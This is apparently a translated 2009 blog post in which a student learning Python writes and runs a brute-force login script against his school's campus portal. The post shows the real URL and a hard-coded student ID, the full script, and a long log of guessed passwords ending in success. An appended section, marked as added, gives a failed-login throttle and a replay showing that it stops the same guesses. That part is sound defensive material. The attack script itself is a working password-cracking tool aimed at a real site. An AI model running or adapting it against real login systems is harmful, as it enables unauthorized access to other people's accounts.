From Zero Python Knowledge to Writing a Web Brute-Force Cracking Script

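The Level 2 exam is over and the results are not out yet. I now have 7 classes a week, and I am puzzled: could they not schedule a few more courses? Don't make the padding so obvious, or I will be too embarrassed to tell my high-school classmates how "many" classes we have and how "busy" we are.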

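What can relieve the boredom? Only going online! I am planning to use Python to write a script that brute-forces the school's digital campus system (note: I started reading <python入门.doc> three days ago). I have skimmed the data types and the syntax of the various control structures: for, if, elif, else and so on. Python currently has two stable versions, 2.6.1 and 3.0.1. I hear the latter improved a lot of things, for example removing urllib2 and merging it into urllib. It is exactly because Python is improving so quickly that much of the source code I found through Google no longer runs.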

#tunpishuang at gmail dot com
#2009.4.1
#dc_crack.py 0.0.1
import urllib.request
import urllib.parse
fsock=open('pass.txt','r')
for i in range(1,10000000):
    pw=fsock.readline(7)
    params = urllib.parse.urlencode({"tbUserNo": 20720310307, "tbPW": pw})
    f = urllib.request.urlopen("http://dc.cqit.edu.cn/userlogin.aspx", params)
    flag=str(f.read(9))
    if(flag == "b' <script>t'"):
        print("login ok!")
        print("the true password is: %s" %pw)
        break
    else:
        print("flag:%s ,password:< %s> wrong !trying next password…\n" % (flag,pw))

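The result is judged with the read(9) method of the file-like object of the http.client.HTTPResponse instance. At first it returned error! whether or not the password was correct. Later I posted on the Google group comp.lang.python, and a foreigner kindly answered this newbie's question, for which I am very grateful. It turns out that Python 3.x uses unicode by default but HTTP returns bytes, so the result has to be converted with str(); that is roughly it. Finally I changed my own password to 0000010, a value fairly near the start, and ran a test: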

flag:b' a' ,password:<0000000> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000001> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000002> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000003> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000004> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000005> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000006> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000007> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000008> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

flag:b' a' ,password:<0000009> wrong !trying next password…

flag:b' a' ,password:<

wrong !trying next password…

login ok!

the true password is: 0000010

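Cracked, time to call it a day~ The next step is to improve it a bit: load the dictionary straight into memory, support get, post and a custom action page through parameters, custom input to send… etc…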
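
Seen from the defending side, the test run above completes because the login page kept answering consecutive guesses for a single account. The following is an added example, not part of the original post or of the portal's code: a per-account failed-login throttle replayed against the same guess sequence. `LoginThrottle`, `replay`, the thresholds and the account name are assumptions made for illustration.

```python
import hmac
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Per-account sliding-window cap on failed logins (hypothetical helper)."""

    def __init__(self, max_failures=5, window=900.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window              # seconds a failure stays counted
        self.clock = clock                # injectable so the replay is deterministic
        self._failures = defaultdict(deque)   # account -> failure timestamps

    def locked(self, account):
        q = self._failures[account]
        cutoff = self.clock() - self.window
        while q and q[0] <= cutoff:       # forget failures older than the window
            q.popleft()
        return len(q) >= self.max_failures

    def attempt(self, account, password, verify):
        """Return 'locked', 'ok' or 'denied'; a locked account never reaches verify()."""
        if self.locked(account):
            return "locked"
        if verify(account, password):
            self._failures.pop(account, None)   # success clears the counter
            return "ok"
        self._failures[account].append(self.clock())
        return "denied"


def replay(guesses, real_password, max_failures=5, window=900.0, gap=0.5):
    """Replay constructed guesses, `gap` seconds apart, against one account."""
    now = [0.0]
    throttle = LoginThrottle(max_failures, window, clock=lambda: now[0])
    # Plain comparison stands in for a real password-hash check (assumption).
    verify = lambda _acct, pw: hmac.compare_digest(pw, real_password)
    outcomes = []
    for pw in guesses:
        outcomes.append(throttle.attempt("account-placeholder", pw, verify))
        now[0] += gap
    return outcomes


if __name__ == "__main__":
    # Constructed input: the same sequence as the test run above, 0000000..0000010.
    guesses = ["%07d" % i for i in range(11)]
    print(replay(guesses, "0000010"))
```

With five failures allowed per 15-minute window, the replay ends in `locked` before the correct value is ever checked. Per-account lockout should be paired with per-source limits so that it cannot be used to lock a legitimate user out.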
